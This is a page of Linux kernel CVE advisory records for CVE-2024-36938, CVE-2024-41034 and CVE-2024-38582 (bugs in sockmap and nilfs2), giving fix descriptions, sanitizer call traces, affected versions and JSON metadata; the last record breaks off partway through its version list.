In the Linux kernel, the following vulnerability has been resolved: bpf, skmsg: Fix NULL pointer dereference in sk_psock_skb_ingress_enqueue Fix NULL pointer data-races in sk_psock_skb_ingress_enqueue() which syzbot reported [1]. [1] BUG: KCSAN: data-race in sk_psock_drop / sk_psock_skb_ingress_enqueue write to 0xffff88814b3278b8 of 8 bytes by task 10724 on cpu 1: sk_psock_stop_verdict net/core/skmsg.c:1257 [inline] sk_psock_drop+0x13e/0x1f0 net/core/skmsg.c:843 sk_psock_put include/linux/skmsg.h:459 [inline] sock_map_close+0x1a7/0x260 net/core/sock_map.c:1648 unix_release+0x4b/0x80 net/unix/af_unix.c:1048 __sock_release net/socket.c:659 [inline] sock_close+0x68/0x150 net/socket.c:1421 __fput+0x2c1/0x660 fs/file_table.c:422 __fput_sync+0x44/0x60 fs/file_table.c:507 __do_sys_close fs/open.c:1556 [inline] __se_sys_close+0x101/0x1b0 fs/open.c:1541 __x64_sys_close+0x1f/0x30 fs/open.c:1541 do_syscall_64+0xd3/0x1d0 entry_SYSCALL_64_after_hwframe+0x6d/0x75 read to 0xffff88814b3278b8 of 8 bytes by task 10713 on cpu 0: sk_psock_data_ready include/linux/skmsg.h:464 [inline] sk_psock_skb_ingress_enqueue+0x32d/0x390 net/core/skmsg.c:555 sk_psock_skb_ingress_self+0x185/0x1e0 net/core/skmsg.c:606 sk_psock_verdict_apply net/core/skmsg.c:1008 [inline] sk_psock_verdict_recv+0x3e4/0x4a0 net/core/skmsg.c:1202 unix_read_skb net/unix/af_unix.c:2546 [inline] unix_stream_read_skb+0x9e/0xf0 net/unix/af_unix.c:2682 sk_psock_verdict_data_ready+0x77/0x220 net/core/skmsg.c:1223 unix_stream_sendmsg+0x527/0x860 net/unix/af_unix.c:2339 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg+0x140/0x180 net/socket.c:745 ____sys_sendmsg+0x312/0x410 net/socket.c:2584 ___sys_sendmsg net/socket.c:2638 [inline] __sys_sendmsg+0x1e9/0x280 net/socket.c:2667 __do_sys_sendmsg net/socket.c:2676 [inline] __se_sys_sendmsg net/socket.c:2674 [inline] __x64_sys_sendmsg+0x46/0x50 net/socket.c:2674 do_syscall_64+0xd3/0x1d0 entry_SYSCALL_64_after_hwframe+0x6d/0x75 value changed: 0xffffffff83d7feb0 -> 0x0000000000000000 Reported by Kernel Concurrency Sanitizer on: CPU: 0 PID: 10713 Comm: syz-executor.4 Tainted: G W 6.8.0-syzkaller-08951-gfe46a7dd189e #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 02/29/2024 Prior to this, commit 4cd12c6065df ("bpf, sockmap: Fix NULL pointer dereference in sk_psock_verdict_data_ready()") fixed one NULL pointer similarly due to no protection of saved_data_ready. Here is another different caller causing the same issue because of the same reason. So we should protect it with sk_callback_lock read lock because the writer side in the sk_psock_drop() uses "write_lock_bh(&sk->sk_callback_lock);". To avoid errors that could happen in future, I move those two pairs of lock into the sk_psock_data_ready(), which is suggested by John Fastabend.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/c0809c128dad4c341…
	https://git.kernel.org/stable/c/5965bc7535fb87510…
	https://git.kernel.org/stable/c/39dc9e1442385d6e9…
	https://git.kernel.org/stable/c/b397a0ab8582c533e…
	https://git.kernel.org/stable/c/772d5729b5ff0df0d…
	https://git.kernel.org/stable/c/6648e613226e18897…

Impacted products

Vendor

Product

Version

Linux

Affected: 604326b41a6fb9b4a78b6179335decee0365cd8c , < c0809c128dad4c3413818384eb06a341633db973 (git)
Affected: 604326b41a6fb9b4a78b6179335decee0365cd8c , < 5965bc7535fb87510b724e5465ccc1a1cf00916d (git)
Affected: 604326b41a6fb9b4a78b6179335decee0365cd8c , < 39dc9e1442385d6e9be0b6491ee488dddd55ae27 (git)
Affected: 604326b41a6fb9b4a78b6179335decee0365cd8c , < b397a0ab8582c533ec0c6b732392f141fc364f87 (git)
Affected: 604326b41a6fb9b4a78b6179335decee0365cd8c , < 772d5729b5ff0df0d37b32db600ce635b2172f80 (git)
Affected: 604326b41a6fb9b4a78b6179335decee0365cd8c , < 6648e613226e18897231ab5e42ffc29e63fa3365 (git)

Linux

Affected: 4.20
Unaffected: 0 , < 4.20 (semver)
Unaffected: 5.10.223 , ≤ 5.10.* (semver)
Unaffected: 5.15.159 , ≤ 5.15.* (semver)
Unaffected: 6.1.91 , ≤ 6.1.* (semver)
Unaffected: 6.6.31 , ≤ 6.6.* (semver)
Unaffected: 6.8.10 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36938",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-04T15:38:33.489892Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:48:04.434Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:43:50.528Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c0809c128dad4c3413818384eb06a341633db973"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5965bc7535fb87510b724e5465ccc1a1cf00916d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/39dc9e1442385d6e9be0b6491ee488dddd55ae27"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b397a0ab8582c533ec0c6b732392f141fc364f87"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/772d5729b5ff0df0d37b32db600ce635b2172f80"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6648e613226e18897231ab5e42ffc29e63fa3365"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "include/linux/skmsg.h",
            "net/core/skmsg.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "c0809c128dad4c3413818384eb06a341633db973",
              "status": "affected",
              "version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
              "versionType": "git"
            },
            {
              "lessThan": "5965bc7535fb87510b724e5465ccc1a1cf00916d",
              "status": "affected",
              "version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
              "versionType": "git"
            },
            {
              "lessThan": "39dc9e1442385d6e9be0b6491ee488dddd55ae27",
              "status": "affected",
              "version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
              "versionType": "git"
            },
            {
              "lessThan": "b397a0ab8582c533ec0c6b732392f141fc364f87",
              "status": "affected",
              "version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
              "versionType": "git"
            },
            {
              "lessThan": "772d5729b5ff0df0d37b32db600ce635b2172f80",
              "status": "affected",
              "version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
              "versionType": "git"
            },
            {
              "lessThan": "6648e613226e18897231ab5e42ffc29e63fa3365",
              "status": "affected",
              "version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "include/linux/skmsg.h",
            "net/core/skmsg.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.20"
            },
            {
              "lessThan": "4.20",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.223",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.159",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.91",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.31",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.223",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.159",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.91",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.31",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.10",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf, skmsg: Fix NULL pointer dereference in sk_psock_skb_ingress_enqueue\n\nFix NULL pointer data-races in sk_psock_skb_ingress_enqueue() which\nsyzbot reported [1].\n\n[1]\nBUG: KCSAN: data-race in sk_psock_drop / sk_psock_skb_ingress_enqueue\n\nwrite to 0xffff88814b3278b8 of 8 bytes by task 10724 on cpu 1:\n sk_psock_stop_verdict net/core/skmsg.c:1257 [inline]\n sk_psock_drop+0x13e/0x1f0 net/core/skmsg.c:843\n sk_psock_put include/linux/skmsg.h:459 [inline]\n sock_map_close+0x1a7/0x260 net/core/sock_map.c:1648\n unix_release+0x4b/0x80 net/unix/af_unix.c:1048\n __sock_release net/socket.c:659 [inline]\n sock_close+0x68/0x150 net/socket.c:1421\n __fput+0x2c1/0x660 fs/file_table.c:422\n __fput_sync+0x44/0x60 fs/file_table.c:507\n __do_sys_close fs/open.c:1556 [inline]\n __se_sys_close+0x101/0x1b0 fs/open.c:1541\n __x64_sys_close+0x1f/0x30 fs/open.c:1541\n do_syscall_64+0xd3/0x1d0\n entry_SYSCALL_64_after_hwframe+0x6d/0x75\n\nread to 0xffff88814b3278b8 of 8 bytes by task 10713 on cpu 0:\n sk_psock_data_ready include/linux/skmsg.h:464 [inline]\n sk_psock_skb_ingress_enqueue+0x32d/0x390 net/core/skmsg.c:555\n sk_psock_skb_ingress_self+0x185/0x1e0 net/core/skmsg.c:606\n sk_psock_verdict_apply net/core/skmsg.c:1008 [inline]\n sk_psock_verdict_recv+0x3e4/0x4a0 net/core/skmsg.c:1202\n unix_read_skb net/unix/af_unix.c:2546 [inline]\n unix_stream_read_skb+0x9e/0xf0 net/unix/af_unix.c:2682\n sk_psock_verdict_data_ready+0x77/0x220 net/core/skmsg.c:1223\n unix_stream_sendmsg+0x527/0x860 net/unix/af_unix.c:2339\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg+0x140/0x180 net/socket.c:745\n ____sys_sendmsg+0x312/0x410 net/socket.c:2584\n ___sys_sendmsg net/socket.c:2638 [inline]\n __sys_sendmsg+0x1e9/0x280 net/socket.c:2667\n __do_sys_sendmsg net/socket.c:2676 [inline]\n __se_sys_sendmsg net/socket.c:2674 [inline]\n __x64_sys_sendmsg+0x46/0x50 net/socket.c:2674\n do_syscall_64+0xd3/0x1d0\n entry_SYSCALL_64_after_hwframe+0x6d/0x75\n\nvalue changed: 0xffffffff83d7feb0 -\u003e 0x0000000000000000\n\nReported by Kernel Concurrency Sanitizer on:\nCPU: 0 PID: 10713 Comm: syz-executor.4 Tainted: G        W          6.8.0-syzkaller-08951-gfe46a7dd189e #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 02/29/2024\n\nPrior to this, commit 4cd12c6065df (\"bpf, sockmap: Fix NULL pointer\ndereference in sk_psock_verdict_data_ready()\") fixed one NULL pointer\nsimilarly due to no protection of saved_data_ready. Here is another\ndifferent caller causing the same issue because of the same reason. So\nwe should protect it with sk_callback_lock read lock because the writer\nside in the sk_psock_drop() uses \"write_lock_bh(\u0026sk-\u003esk_callback_lock);\".\n\nTo avoid errors that could happen in future, I move those two pairs of\nlock into the sk_psock_data_ready(), which is suggested by John Fastabend."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:12:27.522Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/c0809c128dad4c3413818384eb06a341633db973"
        },
        {
          "url": "https://git.kernel.org/stable/c/5965bc7535fb87510b724e5465ccc1a1cf00916d"
        },
        {
          "url": "https://git.kernel.org/stable/c/39dc9e1442385d6e9be0b6491ee488dddd55ae27"
        },
        {
          "url": "https://git.kernel.org/stable/c/b397a0ab8582c533ec0c6b732392f141fc364f87"
        },
        {
          "url": "https://git.kernel.org/stable/c/772d5729b5ff0df0d37b32db600ce635b2172f80"
        },
        {
          "url": "https://git.kernel.org/stable/c/6648e613226e18897231ab5e42ffc29e63fa3365"
        }
      ],
      "title": "bpf, skmsg: Fix NULL pointer dereference in sk_psock_skb_ingress_enqueue",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36938",
    "datePublished": "2024-05-30T15:29:26.929Z",
    "dateReserved": "2024-05-30T15:25:07.071Z",
    "dateUpdated": "2025-05-04T09:12:27.522Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-41034 (GCVE-0-2024-41034)

Vulnerability from cvelistv5 – Published: 2024-07-29 14:31 – Updated: 2025-11-03 21:59

Title

nilfs2: fix kernel bug on rename operation of broken directory

Summary

In the Linux kernel, the following vulnerability has been resolved: nilfs2: fix kernel bug on rename operation of broken directory Syzbot reported that in rename directory operation on broken directory on nilfs2, __block_write_begin_int() called to prepare block write may fail BUG_ON check for access exceeding the folio/page size. This is because nilfs_dotdot(), which gets parent directory reference entry ("..") of the directory to be moved or renamed, does not check consistency enough, and may return location exceeding folio/page size for broken directories. Fix this issue by checking required directory entries ("." and "..") in the first chunk of the directory in nilfs_dotdot().

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/ff9767ba2cb949701…
	https://git.kernel.org/stable/c/24c1c8566a9b6be51…
	https://git.kernel.org/stable/c/a9a466a69b85059b3…
	https://git.kernel.org/stable/c/7000b438dda9d0f41…
	https://git.kernel.org/stable/c/1a8879c0771a68d70…
	https://git.kernel.org/stable/c/60f61514374e4a0c3…
	https://git.kernel.org/stable/c/298cd810d7fb687c9…
	https://git.kernel.org/stable/c/a9e1ddc09ca557460…

Impacted products

Vendor

Product

Version

Linux

Affected: 2ba466d74ed74f073257f86e61519cb8f8f46184 , < ff9767ba2cb949701e45e6e4287f8af82986b703 (git)
Affected: 2ba466d74ed74f073257f86e61519cb8f8f46184 , < 24c1c8566a9b6be51f5347be2ea76e25fc82b11e (git)
Affected: 2ba466d74ed74f073257f86e61519cb8f8f46184 , < a9a466a69b85059b341239766a10efdd3ee68a4b (git)
Affected: 2ba466d74ed74f073257f86e61519cb8f8f46184 , < 7000b438dda9d0f41a956fc9bffed92d2eb6be0d (git)
Affected: 2ba466d74ed74f073257f86e61519cb8f8f46184 , < 1a8879c0771a68d70ee2e5e66eea34207e8c6231 (git)
Affected: 2ba466d74ed74f073257f86e61519cb8f8f46184 , < 60f61514374e4a0c3b65b08c6024dd7e26150bfd (git)
Affected: 2ba466d74ed74f073257f86e61519cb8f8f46184 , < 298cd810d7fb687c90a14d8f9fd1b8719a7cb8a5 (git)
Affected: 2ba466d74ed74f073257f86e61519cb8f8f46184 , < a9e1ddc09ca55746079cc479aa3eb6411f0d99d4 (git)

Linux

Affected: 2.6.30
Unaffected: 0 , < 2.6.30 (semver)
Unaffected: 4.19.318 , ≤ 4.19.* (semver)
Unaffected: 5.4.280 , ≤ 5.4.* (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.100 , ≤ 6.1.* (semver)
Unaffected: 6.6.41 , ≤ 6.6.* (semver)
Unaffected: 6.9.10 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:59:30.758Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ff9767ba2cb949701e45e6e4287f8af82986b703"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/24c1c8566a9b6be51f5347be2ea76e25fc82b11e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a9a466a69b85059b341239766a10efdd3ee68a4b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7000b438dda9d0f41a956fc9bffed92d2eb6be0d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1a8879c0771a68d70ee2e5e66eea34207e8c6231"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/60f61514374e4a0c3b65b08c6024dd7e26150bfd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/298cd810d7fb687c90a14d8f9fd1b8719a7cb8a5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a9e1ddc09ca55746079cc479aa3eb6411f0d99d4"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41034",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:23:37.441886Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:32:58.811Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/nilfs2/dir.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "ff9767ba2cb949701e45e6e4287f8af82986b703",
              "status": "affected",
              "version": "2ba466d74ed74f073257f86e61519cb8f8f46184",
              "versionType": "git"
            },
            {
              "lessThan": "24c1c8566a9b6be51f5347be2ea76e25fc82b11e",
              "status": "affected",
              "version": "2ba466d74ed74f073257f86e61519cb8f8f46184",
              "versionType": "git"
            },
            {
              "lessThan": "a9a466a69b85059b341239766a10efdd3ee68a4b",
              "status": "affected",
              "version": "2ba466d74ed74f073257f86e61519cb8f8f46184",
              "versionType": "git"
            },
            {
              "lessThan": "7000b438dda9d0f41a956fc9bffed92d2eb6be0d",
              "status": "affected",
              "version": "2ba466d74ed74f073257f86e61519cb8f8f46184",
              "versionType": "git"
            },
            {
              "lessThan": "1a8879c0771a68d70ee2e5e66eea34207e8c6231",
              "status": "affected",
              "version": "2ba466d74ed74f073257f86e61519cb8f8f46184",
              "versionType": "git"
            },
            {
              "lessThan": "60f61514374e4a0c3b65b08c6024dd7e26150bfd",
              "status": "affected",
              "version": "2ba466d74ed74f073257f86e61519cb8f8f46184",
              "versionType": "git"
            },
            {
              "lessThan": "298cd810d7fb687c90a14d8f9fd1b8719a7cb8a5",
              "status": "affected",
              "version": "2ba466d74ed74f073257f86e61519cb8f8f46184",
              "versionType": "git"
            },
            {
              "lessThan": "a9e1ddc09ca55746079cc479aa3eb6411f0d99d4",
              "status": "affected",
              "version": "2ba466d74ed74f073257f86e61519cb8f8f46184",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/nilfs2/dir.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.30"
            },
            {
              "lessThan": "2.6.30",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.318",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.280",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.100",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.41",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.318",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.280",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.100",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.41",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.10",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: fix kernel bug on rename operation of broken directory\n\nSyzbot reported that in rename directory operation on broken directory on\nnilfs2, __block_write_begin_int() called to prepare block write may fail\nBUG_ON check for access exceeding the folio/page size.\n\nThis is because nilfs_dotdot(), which gets parent directory reference\nentry (\"..\") of the directory to be moved or renamed, does not check\nconsistency enough, and may return location exceeding folio/page size for\nbroken directories.\n\nFix this issue by checking required directory entries (\".\" and \"..\") in\nthe first chunk of the directory in nilfs_dotdot()."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:20:34.460Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/ff9767ba2cb949701e45e6e4287f8af82986b703"
        },
        {
          "url": "https://git.kernel.org/stable/c/24c1c8566a9b6be51f5347be2ea76e25fc82b11e"
        },
        {
          "url": "https://git.kernel.org/stable/c/a9a466a69b85059b341239766a10efdd3ee68a4b"
        },
        {
          "url": "https://git.kernel.org/stable/c/7000b438dda9d0f41a956fc9bffed92d2eb6be0d"
        },
        {
          "url": "https://git.kernel.org/stable/c/1a8879c0771a68d70ee2e5e66eea34207e8c6231"
        },
        {
          "url": "https://git.kernel.org/stable/c/60f61514374e4a0c3b65b08c6024dd7e26150bfd"
        },
        {
          "url": "https://git.kernel.org/stable/c/298cd810d7fb687c90a14d8f9fd1b8719a7cb8a5"
        },
        {
          "url": "https://git.kernel.org/stable/c/a9e1ddc09ca55746079cc479aa3eb6411f0d99d4"
        }
      ],
      "title": "nilfs2: fix kernel bug on rename operation of broken directory",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41034",
    "datePublished": "2024-07-29T14:31:49.043Z",
    "dateReserved": "2024-07-12T12:17:45.619Z",
    "dateUpdated": "2025-11-03T21:59:30.758Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-38582 (GCVE-0-2024-38582)

Vulnerability from cvelistv5 – Published: 2024-06-19 13:37 – Updated: 2026-01-05 10:36

Title

nilfs2: fix potential hang in nilfs_detach_log_writer()

Summary

In the Linux kernel, the following vulnerability has been resolved: nilfs2: fix potential hang in nilfs_detach_log_writer() Syzbot has reported a potential hang in nilfs_detach_log_writer() called during nilfs2 unmount. Analysis revealed that this is because nilfs_segctor_sync(), which synchronizes with the log writer thread, can be called after nilfs_segctor_destroy() terminates that thread, as shown in the call trace below: nilfs_detach_log_writer nilfs_segctor_destroy nilfs_segctor_kill_thread --> Shut down log writer thread flush_work nilfs_iput_work_func nilfs_dispose_list iput nilfs_evict_inode nilfs_transaction_commit nilfs_construct_segment (if inode needs sync) nilfs_segctor_sync --> Attempt to synchronize with log writer thread *** DEADLOCK *** Fix this issue by changing nilfs_segctor_sync() so that the log writer thread returns normally without synchronizing after it terminates, and by forcing tasks that are already waiting to complete once after the thread terminates. The skipped inode metadata flushout will then be processed together in the subsequent cleanup work in nilfs_segctor_destroy().

Severity ?

5.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/911d38be151921a5d…
	https://git.kernel.org/stable/c/bc9cee50a4a4ca23b…
	https://git.kernel.org/stable/c/eff7cdf890b02596b…
	https://git.kernel.org/stable/c/06afce714d87c7cd1…
	https://git.kernel.org/stable/c/1c3844c5f4eac0439…
	https://git.kernel.org/stable/c/a8799662fed1f8747…
	https://git.kernel.org/stable/c/6e5c8e8e024e147b8…
	https://git.kernel.org/stable/c/c516db6ab9eabbedb…
	https://git.kernel.org/stable/c/eb85dace897c5986b…

Impacted products

Vendor

Product

Version

Linux

Affected: 7ef3ff2fea8bf5e4a21cef47ad87710a3d0fdb52 , < 911d38be151921a5d152bb55e81fd752384c6830 (git)
Affected: 7ef3ff2fea8bf5e4a21cef47ad87710a3d0fdb52 , < bc9cee50a4a4ca23bdc49f75ea8242d8a2193b3b (git)
Affected: 7ef3ff2fea8bf5e4a21cef47ad87710a3d0fdb52 , < eff7cdf890b02596b8d73e910bdbdd489175dbdb (git)
Affected: 7ef3ff2fea8bf5e4a21cef47ad87710a3d0fdb52 , < 06afce714d87c7cd1dcfccbcd800c5c5d2cf1cfd (git)
Affected: 7ef3ff2fea8bf5e4a21cef47ad87710a3d0fdb52 , < 1c3844c5f4eac043954ebf6403fa9fd1f0e9c1c0 (git)
